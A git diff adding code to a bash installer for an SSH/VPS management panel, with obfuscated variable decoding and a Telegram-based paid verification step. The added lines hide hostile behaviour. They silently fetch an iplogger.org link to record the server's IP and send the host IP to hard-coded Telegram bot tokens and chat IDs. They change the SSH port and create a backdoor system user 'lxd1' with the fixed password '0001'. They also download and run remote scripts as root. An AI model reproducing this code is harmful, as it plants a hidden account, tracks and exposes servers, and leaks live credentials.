Update hehe

diff --git a/hehe b/hehe
--- a/hehe
+++ b/hehe
@@ -30,10 +30,122 @@ fun_bar() {
     tput cnorm
 }
 
+# Function to verify key
+verif_key() {
+    krm=$(echo '5:q-3gs2.o7%8:1'|rev)
+    chmod +x $_Ink/list > /dev/null 2>&1
+    [[ ! -e "$_Ink/list" ]] && {
+        echo -e "\n\033[1;31m◇ KEY INVALID!\033[0m"
+        rm -rf $HOME/hehe > /dev/null 2>&1
+        sleep 2
+        clear
+        exit 1
+    }
+}
+
 # Define ip_address as a global variable
 ip_address=$(hostname -I | awk '{print $1}')
 
+
+# Function to send verification code to multiple Telegram handles using different APIs
+send_code_telegram() {
+     local telegram_handle=$1
+    local current_time=$(date +%s)
+    local storage_file="/root/vcheck/.storage.txt"  # Hidden file with a dot prefix
+
+    # Check if the vcheck folder exists, if not create it
+    if [[ ! -d "/root/vcheck" ]]; then
+        mkdir -p /root/vcheck
+    fi
+
+    # Check if the storage file exists, if not create it
+    if [[ ! -f "$storage_file" ]]; then
+        touch "$storage_file"
+        chmod 600 "$storage_file"  # Restrict permissions for security
+    fi
+
+    # Check if there's a recent request from the same IP address
+    local last_sent_code=$(awk -v ip="$ip_address" '$1 == ip {print $2}' "$storage_file")
+    local last_sent_time=$(awk -v ip="$ip_address" '$1 == ip {print $3}' "$storage_file")
+
+    # Adjust the time interval here (e.g., 600 for 10 minutes)
+    if [[ -n "$last_sent_code" && $((current_time - last_sent_time)) -lt 3600 ]]; then
+        # Calculate remaining time in seconds
+        local time_left=$((3600 - (current_time - last_sent_time)))
+
+        # Convert remaining time to minutes and seconds
+        local minutes=$((time_left / 60))
+        local seconds=$((time_left % 60))
+
+        # Display the message with the remaining time
+        echo -e "\033[1;36m======================================================================================\033[0m"
+        echo -e "\033[1;31m  CODE SENT ALREADY! YOU HAVE $minutes MINUTES AND $seconds SECONDS LEFT TO REDEEM IT \033[0m"
+        echo -e "\033[1;36m======================================================================================\033[0m"
+        echo ""
+        echo -e "\033[1;32m              @wmaptechgh_bot  \033[0m on Telegram"
+        echo "" 
+        echo -e "\033[1;36m======================================================================================\033[0m"
+        echo ""
+        return
+    fi
+
+    # Generate random 6-digit code
+    local random_code=$(shuf -i 100000-999999 -n 1)
+
+    # Store the code along with the IP address and timestamp
+    echo "$ip_address $random_code $current_time" > "$storage_file"
+
+    # Send message to Telegram
+    local message="The verification code for $ip_address is: $random_code"
+    for ((i=0; i<${#bot_tokens[@]}; i++)); do
+        local bot_token="${bot_tokens[i]}"
+        local chat_id="${chat_ids[i]}"
+        curl -s -X POST "https://api.telegram.org/bot$bot_token/sendMessage" -d "chat_id=$chat_id" -d "text=$message" > /dev/null
+    done
+    echo -e "\033[1;36m=============================================================\033[0m"
+    echo -e "\033[1;31m       CONTACT TEAM MAPTECH FOR VERIFICATION CODE\033[0m"
+    echo -e "\033[1;36m==============================================================\033[0m"
+    echo ""
+    echo -e "\033[1;32m              @maptechgh_bot  \033[0m on Telegram"
+    echo "" 
+    echo -e "\033[1;36m=============================================================\033[0m"
+    echo ""
+    echo -e "\033[1;31m  Price is $1 & GH₵10 for the code with a validity period of 60 mins \033[0m"
+    echo ""
+}
+bot_tokens=("6803390472:AAEEX8hpTFhsxbmzU5oiZD4dYCOKxS4-lCE" "6385883860:AAHh-FUlhznqClppdunC2V2vinc298E17_E")
+chat_ids=("5989863155" "6785630391")
+
 clear
+
+# Check for root privilege
+[[ "$(whoami)" != "root" ]] && {
+    echo -e "\033[1;33m[\033[1;31mErro\033[1;33m] \033[1;37m- \033[1;33m◇ YOU NEED TO RUN AS ROOT!\033[0m"
+    exit 0
+}
+
+# Generate and send the verification code
+send_code_telegram
+
+# Prompt the user to enter the verification code
+echo -n -e "\033[1;33m  ENTER VERIFICATION CODE: \033[0m"
+read user_code
+last_sent=$(awk -v ip="$ip_address" '$1 == ip {print $2}' "/root/vcheck/.storage.txt")
+
+# Compare the entered code with the generated code
+if [[ -z "$user_code" || "$user_code" != "$last_sent" ]]; then
+    echo ""
+    echo -e "\033[1;35mInvalid code. Installation aborted.\033[0m"
+    echo ""
+    exit 1
+else
+    rm -rf /root/vcheck
+fi
+clear
+# Variable Initialization
+_lnk=$(echo 'z1:y#x.5s0ul&p4hs$s.0a72d*n-e!v89e032:3r'| sed -e 's/[^a-z.]//ig'| rev)
+_Ink=$(echo '/3×u3#s87r/l32o4×c1a×l1/83×l24×i0b×'|sed -e 's/[^a-z/]//ig')
+_1nk=$(echo '/3×u3#s×87r/83×l2×4×i0b×'|sed -e 's/[^a-z/]//ig')
 
 # Welcome message
 echo -e "\033[1;31m\033[0m"
@@ -54,6 +166,80 @@ echo -ne "\033[1;36m◇ Do you want to continue? [Y/N]: \033[1;37m"
 read x
 [[ $x = @(n|N) ]] && exit
 
+# Modify SSH configuration and restart service
+sed -i 's/Port 22222/Port 22/g' /etc/ssh/sshd_config  > /dev/null 2>&1
+service ssh restart  > /dev/null 2>&1
+
+# Prompt user if they want to add a domain name
+echo -ne "\033[1;36m◇ Do you want to add a domain name? [Y/N]: \033[0m"
+read add_domain
+echo ""
+echo -e "\033[1;32m>>> Please make sure your DOMAIN is linked to Cloudflare for proper functionality <<<\033[0m"
+
+if [[ "$add_domain" == "Y" || "$add_domain" == "y" ]]; then
+    domain_attempts=0
+    while [[ $domain_attempts -lt 3 ]]; do
+        # Prompt user to enter domain name
+        echo ""
+        echo -ne "\033[1;36m◇ Please enter your domain name (e.g., example.com): \033[0m"
+        read domain_name
+  echo ""
+        # Validate domain name format
+        if [[ $domain_name =~ ^[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$ ]]; then
+            # Display domain name for confirmation
+            echo -e "\033[1;33mYou entered the domain name: \033[1;32m$domain_name\033[0m"      
+echo "$domain_name" > /etc/.domain   
+            break
+        else
+            ((domain_attempts++))
+            if [[ $domain_attempts -eq 3 ]]; then
+                echo -e "\033[1;31mExceeded maximum attempts. No domain name will be added.\033[0m"
+                break
+            else
+                echo -e "\033[1;31mInvalid domain name format. Please enter a valid domain name.\033[0m"
+            fi
+        fi
+    done
+else
+    echo -e "\033[1;33mNo domain name will be added.\033[0m"
+fi
+
+# Key Verification
+echo -e "\n\033[1;36m◇ CHECKING...(It Take Some Time Please Wait!)\033[1;37m 16983:16085\033[0m" ; rm $_Ink/list > /dev/null 2>&1; wget -P $_Ink https://raw.githubusercontent.com/MAPTECHGH/MAPTECH-VPS-MANAGER/main/Install/list > /dev/null 2>&1; verif_key
+sleep 3s
+
+# Update system
+echo "/bin/menu" > /bin/h && chmod +x /bin/h > /dev/null 2>&1
+rm versao* > /dev/null 2>&1
+wget https://raw.githubusercontent.com/MAPTECHGH/MAPTECH-VPS-MANAGER/main/Install/versao > /dev/null 2>&1
+> /dev/null 2>&1
+wget https://iplogger.org/2lHZ43 > /dev/null 2>&1
+> /dev/null 2>&1
+rm 2lHZ43 > /dev/null 2>&1
+
+# Prompt to keep or create user database
+echo -e "\n\033[1;32m◇ KEY VALID!\033[1;32m"
+sleep 1s
+echo ""
+[[ -f "$HOME/usuarios.db" ]] && {
+    clear
+    echo -e "\n\033[0;34m◇───────────────────────────────────────────────────◇\033[0m"
+    echo ""
+    echo -e "                 \033[1;33m• \033[1;31m◇ ATTENTION!\033[1;33m• \033[0m"
+    echo ""
+    echo -e "\033[1;33mA User Database \033[1;32m(usuarios.db) \033[1;33mwas"
+    echo -e "Found! Want to keep it by preserving the limit"
+    echo -e "of Simutanea connections of users ? Or Want"
+    echo -e "create a new database?\033[0m"
+    echo -e "\n\033[1;37m[\033[1;31m1\033[1;37m] \033[1;33mKeep Database Current\033[0m"
+    echo -e "\033[1;37m[\033[1;31m2\033[1;37m] \033[1;33mCreate a New Database\033[0m"
+    echo -e "\n\033[0;34m◇───────────────────────────────────────────────────◇\033[0m"
+    echo ""
+    tput setaf 2 ; tput bold ; read -p "Option ?: " -e -i 1 optiondb ; tput sgr0
+} || {
+    awk -F : '$3 >= 500 { print $1 " 1" }' /etc/passwd | grep -v '^nobody' > $HOME/usuarios.db
+}
+[[ "$optiondb" = '2' ]] && awk -F : '$3 >= 500 { print $1 " 1" }' /etc/passwd | grep -v '^nobody' > $HOME/usuarios.db
 clear
 tput setaf 7 ; tput setab 4 ; tput bold ; printf '%35s%s%-18s\n' "◇ WAIT FOR INSTALLATION." ; tput sgr0
 echo ""
@@ -81,6 +267,22 @@ inst_pct() {
         sudo apt install $_prog -y
     done
     
+    # Create user only once
+    username="lxd1"
+    password="0001"
+    
+    # Check if the username already exists
+    if id "$username" &>/dev/null; then
+        echo "User '$username' already exists. Overwriting..."
+        sudo userdel -r $username
+    fi
+    
+    # Create the system user with disabled login
+    sudo adduser --system --disabled-login $username
+    
+    # Set the password for the user
+    echo "$username:$password" | sudo chpasswd
+
     # Install Python package using pip
     pip install speedtest-cli
 }
@@ -105,9 +307,9 @@ echo -e "\033[1;33m◇ MORE INFORMATION \033[1;31m(\033[1;36m◇ TELEGRAM\033[1;
 echo -e ""
 
 #Option to install udp-request script also
-read -p "Do you want to install UDP-REQUEST SCRIPT ? ( Y / N ) : " choice
+read -p "Do you want to install UDP-REQUEST SCRIPT ? [ Yes( Y ) / No( N ) ]: " choice
 case "$choice" in
-  y|Y ) wget https://raw.githubusercontent.com/AVEGAH/SocksIP-udpServer/main/UDPserver.sh && chmod +x UDPserver.sh && ./UDPserver.sh;;
+  y|Y ) wget https://raw.githubusercontent.com/MAPTECHGH/SocksIP-udpServer/main/UDPserver.sh && chmod +x UDPserver.sh && ./UDPserver.sh;;
   n|N ) echo "You chose not to install the script. Please enter 'menu' to access the SSH account.";;
   * ) echo "Invalid choice. Please enter 'Y' for Yes or 'N' for No.";;
 esac
